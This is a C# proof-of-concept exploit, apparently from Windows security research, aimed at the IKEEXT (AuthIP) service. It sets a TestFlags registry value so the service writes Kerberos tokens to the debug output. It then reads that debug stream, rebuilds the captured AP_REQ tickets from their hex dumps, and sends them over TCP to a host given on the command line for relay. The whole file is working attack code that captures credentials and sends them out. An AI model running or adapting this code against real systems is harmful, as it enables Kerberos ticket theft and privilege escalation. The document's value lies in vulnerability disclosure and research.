﻿using Microsoft.Win32;
using NtApiDotNet.Win32;
using NtApiDotNet.Win32.Debugger;
using NtApiDotNet.Win32.Security.Authentication.Kerberos;
using System;
using System.IO;
using System.Net.Sockets;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;

namespace PoC_AuthIPCaptureKerberos_EoP
{
    class Program
    {
        static int GetServicePid()
        {
            Console.WriteLine("Waiting for IKEEXT service PID");
            while (true)
            {
                int pid = ServiceUtils.GetServiceProcessId("IKEEXT");
                if (pid != 0)
                {
                    Console.WriteLine("Got IKEEXT PID {0}", pid);
                    return pid;
                }
                Thread.Sleep(1000);
            }
        }

        static void SetTestFlag()
        {
            using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Services\IKEEXT\Parameters", true))
            {
                key.SetValue("TestFlags", 4, RegistryValueKind.DWord);
            }
        }

        private static int GetHexValue(char c)
        {
            if (c >= '0' && c <= '9')
            {
                return c - '0';
            }
            else if (c >= 'a' && c <= 'f')
            {
                return (c - 'a') + 10;
            }
            else if (c >= 'A' && c <= 'F')
            {
                return (c - 'A') + 10;
            }
            throw new FormatException($"Invalid hex character {c}.");
        }

        static byte[] ParseHexDump(string str)
        {
            if (str.Length == 0)
                return new byte[0];
            Regex re = new Regex("[^a-fA-F0-9]*", RegexOptions.Multiline);
            str = re.Replace(str, "");
            if ((str.Length & 1) != 0)
            {
                throw new FormatException("Invalid hex string length. Must be a multiple of 2.");
            }

            byte[] ret = new byte[str.Length / 2];
            for (int i = 0; i < ret.Length; ++i)
            {
                ret[i] = (byte)((GetHexValue(str[i * 2]) << 4) | GetHexValue(str[i * 2 + 1]));
            }
            return ret;
        }

        static void SendAuth(string target, byte[] bytes)
        {
            if (string.IsNullOrWhiteSpace(target))
                return;
            try
            {
                Console.WriteLine("Sending AP_REQ to {0}:12345", target);
                using (var client = new TcpClient(target, 12345))
                {
                    BinaryWriter writer = new BinaryWriter(client.GetStream());
                    writer.Write(bytes.Length);
                    writer.Write(bytes);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }

        static void ParseToken(string target, StringBuilder builder)
        {
            try
            {
                if (builder.Length == 0)
                    return;

                byte[] bytes = ParseHexDump(builder.ToString());

                var token = KerberosAuthenticationToken.Parse(bytes);
                Console.WriteLine(token);
                if (token is KerberosAPRequestAuthenticationToken ap_req)
                {
                    Console.WriteLine("Captured AP_REQ ticket for {0}", ap_req.Ticket.Principal);
                    SendAuth(target, bytes);
                }
                else if (token is KerberosErrorAuthenticationToken err)
                {
                    Console.WriteLine("Captured Kerberos Error Code: {0}", err.ErrorCode);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.Message);
            }
            finally
            {
                builder.Clear();
            }
        }

        static void Main(string[] args)
        {
            try
            {
                string target = args.Length > 0 ? args[0] : null;
                SetTestFlag();
                int pid = GetServicePid();

                Console.WriteLine("Waiting for AuthIP connection.");
                Win32DebugConsole dbg = Win32DebugConsole.CreateGlobal();
                StringBuilder builder = new StringBuilder();
                while (true)
                {
                    var str = dbg.Read(1000);
                    if (str.ProcessId == pid && str.Output != null)
                    {
                        Console.WriteLine(str.Output);
                        if (str.Output.Equals("ASC intoken:") || str.Output.Equals("ASC outtoken:"))
                        {
                            ParseToken(target, builder);
                        }
                        else
                        {
                            builder.Append(str.Output);
                        }
                    }
                    else
                    {
                        ParseToken(target, builder);
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
